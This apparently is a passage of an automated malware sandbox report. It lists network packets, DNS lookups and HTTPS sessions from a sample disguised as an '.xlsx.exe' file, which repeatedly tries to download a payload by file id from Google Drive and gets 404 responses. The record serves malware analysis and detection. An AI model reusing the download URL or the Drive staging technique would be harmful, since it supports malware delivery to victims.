Dec 16, 2024 18:07:41.084661007 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:41.084675074 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:42.784385920 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:42.784564972 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:42.785248995 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:42.785265923 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:42.785470009 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:42.785475969 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:43.733170033 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:43.733355999 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:43.733546019 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:43.733630896 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:43.733644009 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:43.733695984 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:43.733728886 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:43.733777046 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:43.734832048 CET	50028	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:43.734849930 CET	443	50028	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:53.788002968 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:53.788089037 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:53.792012930 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:53.796022892 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:53.796050072 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:55.496732950 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:55.496819019 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:55.499460936 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:55.499581099 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:55.512476921 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:55.512490988 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:55.512921095 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:55.512974977 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:55.521656990 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:55.567341089 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:56.403369904 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:56.403558969 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:56.403573036 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:56.403661013 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:56.403704882 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:56.403704882 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:56.930006981 CET	50029	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:07:56.930032015 CET	443	50029	172.217.19.174	192.168.2.6
Dec 16, 2024 18:07:57.098874092 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:57.098937988 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:57.099025011 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:57.099447966 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:57.099467039 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:58.821723938 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:58.821858883 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:58.822277069 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:58.822283983 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:58.822447062 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:58.822452068 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757395983 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757460117 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:59.757484913 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757531881 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757534981 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:59.757564068 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757582903 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:59.757622957 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:59.757704973 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757790089 CET	50030	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:07:59.757826090 CET	443	50030	142.250.181.1	192.168.2.6
Dec 16, 2024 18:07:59.757877111 CET	50030	443	192.168.2.6	142.250.181.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 18:05:16.772089005 CET	65352	53	192.168.2.6	1.1.1.1
Dec 16, 2024 18:05:16.916702986 CET	53	65352	1.1.1.1	192.168.2.6
Dec 16, 2024 18:05:19.658277035 CET	60995	53	192.168.2.6	1.1.1.1
Dec 16, 2024 18:05:19.797868967 CET	53	60995	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 18:05:16.772089005 CET	192.168.2.6	1.1.1.1	0x2162	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 18:05:19.658277035 CET	192.168.2.6	1.1.1.1	0x8e14	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 18:04:49.411664009 CET	1.1.1.1	192.168.2.6	0xf29c	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 18:04:49.411664009 CET	1.1.1.1	192.168.2.6	0xf29c	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 16, 2024 18:05:16.916702986 CET	1.1.1.1	192.168.2.6	0x2162	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 16, 2024 18:05:19.797868967 CET	1.1.1.1	192.168.2.6	0x8e14	No error (0)	drive.usercontent.google.com		142.250.181.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49756	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:05:18 UTC	216	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-16 17:05:19 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:05:19 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-o6BqJYO8T-R9gl-q3pXvaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49764	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:05:21 UTC	258	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-16 17:05:22 UTC	2218	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7otclPp6kUkj9Txte22X9qcUBAFq6kX4UIMZ89XpCixvR11jxcht3Cm_q4Y8I59C_z Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:05:22 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-QAxJTfIpNBUuOSTsK97zCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU; expires=Tue, 17-Jun-2025 17:05:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:05:22 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 68 55 50 6c 79 34 37 43 67 37 68 41 72 71 6e 50 63 30 34 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0hUPly47Cg7hArqnPc04NQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49806	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:05:34 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:05:35 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:05:34 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-zr-l1QJ0IIg4AoWFS07NDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49811	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:05:37 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:05:37 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC65-DEoJXWYw4Izsi7h2NiMRHNiFvluyONc8W2NVZI2wKz7M8kG3U6XTPZ4NWYWCzOj Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:05:37 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-MxBkN0_e0DXXEWZnj9Toqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:05:37 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 55 4e 70 48 62 49 58 45 59 72 4b 39 6d 34 64 54 43 41 6a 36 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qUNpHbIXEYrK9m4dTCAj6A">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49843	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:05:49 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:05:50 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:05:50 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-OLuLsJifv613kyc3N3ukKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49852	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:05:52 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:05:53 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5Cg-gtBAGLfPXSXvdGgeRxlrSs786ui4JbkTpH2jwIBoqnyKIokNII-bibXZaZeYjk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:05:53 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-sIQsjuBS7kXdZycCF__4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:05:53 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 59 36 67 4b 30 46 62 68 6b 48 71 4a 6d 73 5a 71 4e 7a 55 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IY6gK0FbhkHqJmsZqNzUYw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49888	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
